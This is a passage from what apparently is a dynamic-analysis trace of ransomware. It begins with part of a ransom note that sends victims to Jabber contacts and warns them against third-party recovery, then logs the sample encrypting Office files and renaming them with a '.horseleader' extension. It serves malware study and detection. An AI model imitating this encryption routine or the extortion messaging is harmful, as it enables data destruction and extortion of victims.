https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.683] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.684] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.684] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.685] CloseHandle (hObject=0x1a4) returned 1 [0244.685] GetProcessHeap () returned 0x780000 [0244.685] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.685] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6cee1d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="pidgenx.dll", cAlternateFileName="")) returned 1 [0244.685] lstrcmpiW (lpString1="pidgenx.dll", lpString2="Windows") returned -1 [0244.685] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 95 [0244.685] StrStrIW (lpFirst="pidgenx.dll", lpSrch=".horseleader") returned 0x0 [0244.685] lstrcmpW (lpString1="pidgenx.dll", lpString2="#Decrypt#.txt") returned 1 [0244.685] lstrcmpW (lpString1="pidgenx.dll", lpString2="_uninstalling_.png") returned 1 [0244.685] lstrlenW (lpString=".testttjffg") returned 11 [0244.685] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll", lpSrch=".testttjffg") returned 0x0 [0244.685] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.685] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.686] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.687] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 95 [0244.687] StrStrW (lpFirst="pidgenx.dll", lpSrch=".txt") returned 0x0 [0244.687] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1463568) returned 1 [0244.687] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.687] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.690] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.690] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.690] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb0288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.691] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.696] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.696] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.697] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x160510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.697] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.699] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.700] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.700] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.700] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.700] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.700] CloseHandle (hObject=0x1a4) returned 1 [0244.701] GetProcessHeap () returned 0x780000 [0244.701] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.701] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll.horseleader") returned 107 [0244.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll.horseleader")) returned 1 [0244.702] GetProcessHeap () returned 0x780000 [0244.702] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.702] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17eefe00, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0xbe99ad60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x17eefe00, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0244.702] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0244.702] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 108 [0244.702] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".horseleader") returned 0x0 [0244.702] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0244.702] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0244.702] lstrlenW (lpString=".testttjffg") returned 11 [0244.702] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0244.702] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.702] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.704] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 108 [0244.704] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0244.704] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=715834) returned 1 [0244.704] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.704] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.707] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.707] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.708] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x54e1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.709] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.711] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.711] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa9c3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.712] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.714] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.714] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.715] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.715] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.715] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.715] CloseHandle (hObject=0x1a4) returned 1 [0244.715] GetProcessHeap () returned 0x780000 [0244.715] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.716] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms.horseleader") returned 120 [0244.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms.horseleader")) returned 1 [0244.717] GetProcessHeap () returned 0x780000 [0244.717] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.717] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6904ef00, ftCreationTime.dwHighDateTime=0x1ca912c, ftLastAccessTime.dwLowDateTime=0x6cf07e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6904ef00, ftLastWriteTime.dwHighDateTime=0x1ca912c, nFileSizeHigh=0x0, nFileSizeLow=0x3d78, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="pkeyconfig.companion.dll", cAlternateFileName="PKEYCO~1.DLL")) returned 1 [0244.717] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="Windows") returned -1 [0244.717] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 108 [0244.717] StrStrIW (lpFirst="pkeyconfig.companion.dll", lpSrch=".horseleader") returned 0x0 [0244.717] lstrcmpW (lpString1="pkeyconfig.companion.dll", lpString2="#Decrypt#.txt") returned 1 [0244.717] lstrcmpW (lpString1="pkeyconfig.companion.dll", lpString2="_uninstalling_.png") returned 1 [0244.717] lstrlenW (lpString=".testttjffg") returned 11 [0244.717] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll", lpSrch=".testttjffg") returned 0x0 [0244.718] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.718] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.718] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.718] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 108 [0244.718] StrStrW (lpFirst="pkeyconfig.companion.dll", lpSrch=".txt") returned 0x0 [0244.718] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=15736) returned 1 [0244.719] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3d78, lpOverlapped=0x0) returned 1 [0244.721] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc288, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.721] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3d78, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3d78, lpOverlapped=0x0) returned 1 [0244.721] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.721] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.722] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.722] CloseHandle (hObject=0x1a4) returned 1 [0244.722] GetProcessHeap () returned 0x780000 [0244.722] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.722] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll.horseleader") returned 120 [0244.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll.horseleader")) returned 1 [0244.723] GetProcessHeap () returned 0x780000 [0244.723] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.723] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5e95d10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="PowerPoint.en-us", cAlternateFileName="POWERP~1.EN-")) returned 1 [0244.723] lstrcmpiW (lpString1="PowerPoint.en-us", lpString2="Windows") returned -1 [0244.723] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us") returned 100 [0244.723] lstrcmpW (lpString1="PowerPoint.en-us", lpString2=".") returned 1 [0244.723] lstrcmpW (lpString1="PowerPoint.en-us", lpString2="..") returned 1 [0244.723] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.723] GetProcessHeap () returned 0x780000 [0244.723] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.723] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\*") returned 102 [0244.723] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5e95d10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.724] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.725] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\.") returned 102 [0244.725] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.725] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5e95d10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.725] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.725] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\..") returned 103 